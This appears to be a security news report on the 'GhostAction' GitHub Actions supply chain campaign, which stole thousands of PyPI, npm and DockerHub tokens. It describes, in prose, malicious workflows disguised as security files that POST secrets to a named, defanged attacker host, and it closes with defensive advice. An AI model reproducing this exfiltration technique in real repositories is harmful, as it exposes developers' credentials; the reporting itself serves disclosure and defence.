A supply chain attack dubbed "GhostAction" has compromised 327 GitHub users across 817 repositories, successfully exfiltrating 3,325 sensitive credentials, including PyPI, npm, and DockerHub tokens. Security firm GitGuardian discovered the campaign, marking another escalation in the ongoing wave of supply chain attacks targeting the software development ecosystem.
The attack began with the compromise of GitHub user "Grommash9" on September 2, who pushed malicious GitHub Actions workflows disguised as security enhancements. These workflows contained curl commands that sent stolen credentials to an attacker-controlled server at hxxps://bold-dhawan.45-139-104-115.plesk.page via HTTP POST requests.
The attackers systematically enumerated secrets from legitimate workflow files, then hardcoded these secret names into malicious workflows targeting DockerHub credentials, GitHub tokens, and NPM tokens. The malicious workflows bore innocuous titles like "GitHub Actions Security" and were embedded in .github/workflows/github_actions_security.yml files.
GitGuardian's Charles Brossollet noted that "Several companies were found to have their entire SDK portfolio compromised, with malicious workflows affecting their Python, Rust, JavaScript, and Go repositories simultaneously." The attack's scope reveals a highly coordinated effort targeting the modern multi-language development landscape.
This attack comes amid an unprecedented surge in supply chain compromises. Just days earlier, on September 8, 2025, one of the largest npm supply chain incidents in recent history unfolded when popular libraries like debug and chalk, along with 18 other utilities, were hijacked.
Additionally, the "s1ngularity" attack compromised Nx NPM packages with 24 million monthly downloads using AI-assisted malware to steal developer credentials.
Following disclosure, rapid remediation efforts began immediately. PyPI moved affected projects to read-only status within hours, and GitGuardian successfully created security alerts for 573 of 717 affected projects.
However, initial discussions with developers confirmed that attackers were actively exploiting stolen AWS access keys and database credentials.
Protecting Against Workflow Attacks
Developers should immediately audit their GitHub Actions workflows for unauthorized changes, rotate any potentially compromised secrets, and implement workflow approval requirements for repository changes. Organizations should also monitor for unexpected workflow executions and restrict workflow permissions to the minimum necessary levels.
The GhostAction campaign underscores the critical vulnerability of CI/CD pipelines in modern software development, where a single compromised workflow can expose an entire organization's development infrastructure.